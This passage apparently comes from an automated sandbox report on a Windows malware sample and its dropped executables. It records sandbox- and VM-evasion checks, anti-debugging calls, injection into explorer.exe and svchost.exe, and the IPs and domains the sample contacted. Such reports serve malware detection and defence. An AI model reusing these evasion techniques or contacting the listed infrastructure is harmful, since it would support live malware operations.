                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after checking mutex)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: ECD2MpEBSf.exe, 00000001.00000002.721906025.0000000001FA0000.00000004.00000001.sdmp, jgdhbua, 0000000B.00000002.776633448.000000000051B000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                      Found evasive API chain (may stop execution after checking locale)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                      Tries to detect virtualization through RDTSC time measurementsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\E3A9.exeRDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\E3A9.exeRDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007F6C94EE7CC4h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007F6C94F14070h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\E3A9.exeRDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00406AA0
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00686CF0
                      Found evasive API chain (may stop execution after checking computer name)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\explorer.exe TID: 6548Thread sleep count: 609 > 30
                      Source: C:\Windows\explorer.exe TID: 6500Thread sleep count: 248 > 30
                      Source: C:\Windows\explorer.exe TID: 6504Thread sleep count: 286 > 30
                      Source: C:\Windows\explorer.exe TID: 5460Thread sleep count: 376 > 30
                      Source: C:\Windows\explorer.exe TID: 6392Thread sleep count: 200 > 30
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe TID: 5488Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6656Thread sleep time: -210000s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 3408Thread sleep count: 52 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 3408Thread sleep time: -52000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 609
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 376
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeAPI coverage: 8.1 %
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeAPI coverage: 6.2 %
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeAPI coverage: 5.9 %
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeAPI coverage: 4.4 %
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00686CF0
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\888A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9889.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\A4DE.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6C37.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeAPI call chain: ExitProcess graph end node
                      Source: explorer.exe, 00000005.00000000.714532434.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000005.00000000.711357755.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000005.00000000.714532434.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000005.00000000.715039633.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
                      Source: WerFault.exe, 00000010.00000002.807170745.00000000049D8000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.803902943.00000000049D6000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.818844082.000002A078C83000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.819053495.000002A078CEE000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 00000010.00000002.806997904.0000000004960000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW8$
                      Source: explorer.exe, 00000005.00000000.679464850.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                      Source: explorer.exe, 00000005.00000000.715039633.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                      Source: explorer.exe, 00000005.00000000.715488608.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_004198CC GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00688A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_006812E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_006814D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00686090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00689930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00689BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00689D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_0042D770 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00570042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 9_2_006F0042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00690083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0208092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_02080D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0068092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00681250 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0068C3D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00680D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_022B092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_022B0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_006C092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_006C0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00422B00 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_0042CB72 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00419B15 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeMemory protected: page guard
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_0043AA10 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00422B00 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_0042BCB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00428520 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.53.36 25
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: A332.exe.5.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processesShow sources
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E70000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeMemory written: C:\Users\user\Desktop\ECD2MpEBSf.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaMemory written: C:\Users\user\AppData\Roaming\jgdhbua base: 400000 value starts with: 4D5A
